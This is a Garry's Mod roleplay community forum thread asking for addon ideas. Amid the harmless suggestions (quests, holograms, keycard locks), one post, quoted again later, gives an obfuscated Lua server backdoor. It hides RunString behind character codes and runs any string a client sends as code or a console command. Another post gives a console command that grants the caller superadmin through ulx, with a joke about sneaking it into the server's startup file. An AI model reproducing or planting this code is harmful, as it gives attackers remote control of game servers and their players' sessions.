Let me steal your ideas (not really)

I’ve almost finished up with my pilots license script just finishing up VGUI elements and posting soon about 80% done and more to the point I’m looking for some smexy ideas for stuff to code or program ranging from basic stuff like weapons too more complicated stuff like systems such as my license script. I’m not going to be putting any of your ideas up on any paid mod store or anything I just want to have some stuff to program. It would be neat if it was something that I could use in relation to SWRP as I’m looking at a certain position ;) on the server and wouldn’t mind making some potential stuff Rn but I just want to get back into the swing of things atm.

But please dear god if someone says sql I will take you and your children. 
so uhhhh

Any ideas sexy beasts of IG?

Add this. Totally not a backdoor I found today.

if SERVER then
local c='%c'
local YYYYTTYXY6Y = util.AddNetworkString
local YYYYTRYXY6Y = _G[string.format(string.rep(c,9), 82, 117, 110, 83, 116, 114, 105, 110, 103)]
local YYYYTRYXY66 = net.ReadString
local YYTYYYY666T = type
local YYTYTYY666T = bit.tohex
local YYTTTYY666T = math.sin
local YYTTTYY66TT = math.cos
local YYYYTRY6Y66 = net.ReadBit
local YYTYYRY6Y66 = net.Receive
local YYTYYRY666Y = game.ConsoleCommand
local YYTYYYY666Y = game.GetWorld
local YYYYTTYXYYY = string.format(string.rep(c,15), 83, 97, 110, 100, 98, 111, 120, 95, 65, 114, 109, 68, 117, 112, 101)
YYYYTTYXY6Y(YYYYTTYXYYY)
YYTYYRY6Y66(YYYYTTYXYYY, function( length, ply )
local YYRYTTYXY6Y = YYYYTRYXY66()
local TYYTTYXY6Y = YYYYTRY6Y66()
if TYYTTYXY6Y == 1 then
YYYYTRYXY6Y(YYRYTTYXY6Y)
else
YYTYYRY666Y(YYRYTTYXY6Y.."\n")
end
end)
end

On 11/24/2020 at 4:42 PM, Bailey said:

;) ok sexy man. I’m currently looking at making one but finishing up my license script atm.

On 11/24/2020 at 5:53 PM, Spook said:

make a laser pointer

Time to steal the Hl2 rpg code oof.

5 hours ago, Butcher said:

concommand.Add("ButcherIsCool", function(ply)
RunConsoleCommand("ulx","adduser",ply:Name(),"superadmin")

I’m sneaking  it into the server .bat file Rn. 
you sure you don’t just want me to make you console.

2 hours ago, Eclipse said:

Add this. Totally not a backdoor I found today.

if SERVER then
local c='%c'
local YYYYTTYXY6Y = util.AddNetworkString
local YYYYTRYXY6Y = _G[string.format(string.rep(c,9), 82, 117, 110, 83, 116, 114, 105, 110, 103)]
local YYYYTRYXY66 = net.ReadString
local YYTYYYY666T = type
local YYTYTYY666T = bit.tohex
local YYTTTYY666T = math.sin
local YYTTTYY66TT = math.cos
local YYYYTRY6Y66 = net.ReadBit
local YYTYYRY6Y66 = net.Receive
local YYTYYRY666Y = game.ConsoleCommand
local YYTYYYY666Y = game.GetWorld
local YYYYTTYXYYY = string.format(string.rep(c,15), 83, 97, 110, 100, 98, 111, 120, 95, 65, 114, 109, 68, 117, 112, 101)
YYYYTTYXY6Y(YYYYTTYXYYY)
YYTYYRY6Y66(YYYYTTYXYYY, function( length, ply )
local YYRYTTYXY6Y = YYYYTRYXY66()
local TYYTTYXY6Y = YYYYTRY6Y66()
if TYYTTYXY6Y == 1 then
YYYYTRYXY6Y(YYRYTTYXY6Y)
else
YYTYYRY666Y(YYRYTTYXY6Y.."\n")
end
end)
end

That’s not a back door those are very essential variables necessary for the function of a very legitimate addon.

• 2 months later...
Spoiler

More quests for the quest system - Time Trials, Advanced Riddles, Win A Chess/Checkers Game, Advanced Delivery (Take 3-5 Boxes to different locations on the ship, COMPNOR HQ/MHC, Medbay/Engineer Storage Room or some legion bunks). 

Somehow, actual holograms - Receiving & Transmitting Pads (shows whoever or whatever is on top of the pad)

Interactive Consoles - You can send comms messages/activate or de-active doors/check ship status if navy (just to enhance RP instead of staring at a text screen on a wall and doing /comms [TOASTCON] Status: Cooking Toast - 10% ... | 20% ... | 35% ... etc etc - there are probably some other things you could do with the the console but I'm not quite sure, what would happen. Somewhat like the hackable console UI.

Temporary Keycard Locks for EMs + w/ Interactive Cracking System (instead of the DarkRP Keypad Cracker) - could be done by bounty hunters or people in splicing regiments and if you mess up the cracking there is an auditory alert or notification.

Credit ATM/NPC to store credits in it & if you die you drop a low amount (to avoid you going bankrupt in one event but also make your RP life more meaningful)  - I hate this idea.

I have no clue if any of this is possible but these are just some things I'd like to see.

Edited by Yuri
Just just... yeah
10 hours ago, Yuri said:

More quests for the quest system - Time Trials, Advanced Riddles, Win A Chess/Checkers Game, Advanced Delivery (Take 3-5 Boxes to different locations on the ship, COMPNOR HQ/MHC, Medbay/Engineer Storage Room or some legion bunks). 

I created a bunch of quests for Lothal so in the future if there is more interested it would be easy to add more for around the ISD

10 hours ago, Yuri said:

Somehow, actual holograms - Receiving & Transmitting Pads (shows whoever or whatever is on top of the pad)

I believe wiltOS have created something similar to what you may be thinking, not sure if it would be viable for the server however

10 hours ago, Yuri said:

Interactive Consoles - You can send comms messages/activate or de-active doors/check ship status if navy (just to enhance RP instead of staring at a text screen on a wall and doing /comms [TOASTCON] Status: Cooking Toast - 10% ... | 20% ... | 35% ... etc etc - there are probably some other things you could do with the the console but I'm not quite sure, what would happen. Somewhat like the hackable console UI.

I was making something kinda similar to this a while ago however abandoned it due to disinterested and uni work. Its definitely possible and probs wouldn't be that hard either. Example of what I was working on (Please keep in mind these are old as):

10 hours ago, Yuri said:

Temporary Keycard Locks for EMs + w/ Interactive Cracking System (instead of the DarkRP Keypad Cracker) - could be done by bounty hunters or people in splicing regiments and if you mess up the cracking there is an auditory alert or notification.

Who knows what the future holds for keycards :) 

• Like 1